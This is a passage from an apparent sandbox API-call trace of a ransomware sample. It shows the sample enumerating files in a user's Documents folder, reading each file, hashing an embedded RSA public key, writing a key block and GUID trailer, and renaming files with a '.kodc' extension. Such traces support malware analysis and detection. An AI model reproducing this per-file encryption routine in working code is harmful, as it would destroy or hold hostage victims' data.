(hHash=0x3331bc8) returned 1 [0098.251] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.251] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.251] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.251] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1540) returned 0x9b9b950 [0098.251] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x69d4f0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9ceb0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a928 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a940 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.251] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a940 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a940 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a928 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a940 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.252] GetCurrentThreadId () returned 0x42c [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e818 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.253] GetCurrentThreadId () returned 0x42c [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.254] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1539, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.254] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.254] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.254] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.254] CloseHandle (hObject=0x5cc) returned 1 [0098.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0098.255] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eX G.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ex g.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eX G.odp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ex g.odp.kodc")) returned 1 [0098.256] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d01e50, ftCreationTime.dwHighDateTime=0x1d5c0a0, ftLastAccessTime.dwLowDateTime=0xa8c03400, ftLastAccessTime.dwHighDateTime=0x1d5c0c0, ftLastWriteTime.dwLowDateTime=0xa8c03400, ftLastWriteTime.dwHighDateTime=0x1d5c0c0, nFileSizeHigh=0x0, nFileSizeLow=0x14be8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G9jMVN8XZJi.pdf", cAlternateFileName="G9JMVN~1.PDF")) returned 1 [0098.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.256] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9jMVN8XZJi.pdf") returned=".pdf" [0098.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9jMVN8XZJi.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9jmvn8xzji.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.257] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=84968) returned 1 [0098.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.260] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14bc2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.260] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.261] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x14be8, lpOverlapped=0x0) returned 1 [0098.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.262] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.263] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.263] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.263] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.263] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.263] GetLastError () returned 0x0 [0098.263] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.263] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.263] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.263] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.263] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14bf0) returned 0x9ba4d90 [0098.264] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.264] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.265] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14be8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.265] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.265] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.265] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.265] CloseHandle (hObject=0x5cc) returned 1 [0098.268] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9jMVN8XZJi.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9jmvn8xzji.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9jMVN8XZJi.pdf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9jmvn8xzji.pdf.kodc")) returned 1 [0098.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.269] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.270] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ffd2620, ftCreationTime.dwHighDateTime=0x1d53df7, ftLastAccessTime.dwLowDateTime=0x2c116c80, ftLastAccessTime.dwHighDateTime=0x1d56841, ftLastWriteTime.dwLowDateTime=0x2c116c80, ftLastWriteTime.dwHighDateTime=0x1d56841, nFileSizeHigh=0x0, nFileSizeLow=0x4c9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gKkONhl _4JIuyPA7g.xlsx", cAlternateFileName="GKKONH~1.XLS")) returned 1 [0098.270] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gKkONhl _4JIuyPA7g.xlsx") returned=".xlsx" [0098.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gKkONhl _4JIuyPA7g.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gkkonhl _4jiuypa7g.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.270] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=19615) returned 1 [0098.270] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.273] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4c79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.274] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.274] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.274] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4c9f, lpOverlapped=0x0) returned 1 [0098.275] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.275] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.275] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.275] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.276] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.276] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.276] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.276] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.276] GetLastError () returned 0x0 [0098.276] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.276] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.276] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.276] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.276] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4ca0) returned 0x9ba4d90 [0098.276] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 